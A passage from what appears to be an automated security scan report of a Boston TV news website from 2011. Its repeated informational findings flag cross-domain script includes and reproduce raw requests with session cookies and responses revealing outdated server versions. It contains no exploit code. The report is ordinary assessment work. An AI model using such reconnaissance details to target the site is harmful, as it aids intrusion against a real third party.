  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144452/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:53 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7038
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19344
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Gas Leaks</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1498. http://www1.whdh.com/features/articles/hank/BO144489/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144489/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144489/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:52 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2985
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:47 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18713
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Baby Monitors</title>
<meta name="publisher" content="New Englan
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1499. http://www1.whdh.com/features/articles/hank/BO144588/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144588/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hank/BO144588/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:52 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7039
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20268
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Asbestos in Schools</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1500. http://www1.whdh.com/features/articles/hiller/BO144771/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144771/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144771/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7048
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16330
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Pay cut for MA lawmakers</title>
<meta name="publisher" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1501. http://www1.whdh.com/features/articles/hiller/BO144776/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144776/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144776/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=2991
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:41 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17215
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Governor Pre-Inaugural Interview</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1502. http://www1.whdh.com/features/articles/hiller/BO144796/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144796/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144796/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16472
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Hiller - Inauguration</title>
<meta name="publisher" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1503. http://www1.whdh.com/features/articles/hiller/BO144813/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144813/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144813/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7050
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16487
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Arizona Massacre</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1504. http://www1.whdh.com/features/articles/hiller/BO144841/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144841/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/hiller/BO144841/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:34 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7052
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17479
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - One on One with Senator Scott Brown</title>
<meta name="publis
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1505. http://www1.whdh.com/features/articles/holiday_helping/BO144709/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144709/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/holiday_helping/BO144709/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7042
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15382
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Matt Lorch</title>
<meta name="publisher" content="New Eng
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1506. http://www1.whdh.com/features/articles/holiday_helping/BO144719/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144719/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/holiday_helping/BO144719/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2980
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Frances Rivera</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1507. http://www1.whdh.com/features/articles/holiday_helping/BO144727/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144727/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/holiday_helping/BO144727/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7046
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Larry Ridley</title>
<meta name="publisher" content="New E
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1508. http://www1.whdh.com/features/articles/holiday_helping/BO144733/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144733/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://disqus.com/forums/7newsboston/embed.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /features/articles/holiday_helping/BO144733/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15401
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Anne Allred</title>
<meta name="publisher" content="New En
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/7newsboston/embed.js"></script>
...[SNIP]...

21.1509. http://www1.whdh.com/features/main/dish/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/main/dish/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /features/main/dish/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=467
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20944
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish</title>
<meta name="publisher" content="New England News Station Boston Cha
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1510. http://www1.whdh.com/features/main/hank/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/main/hank/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /features/main/hank/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2973
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23082
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates</title>
<meta name="publisher" content="New England News Station B
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1511. http://www1.whdh.com/features/main/hiller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/main/hiller/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /features/main/hiller/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
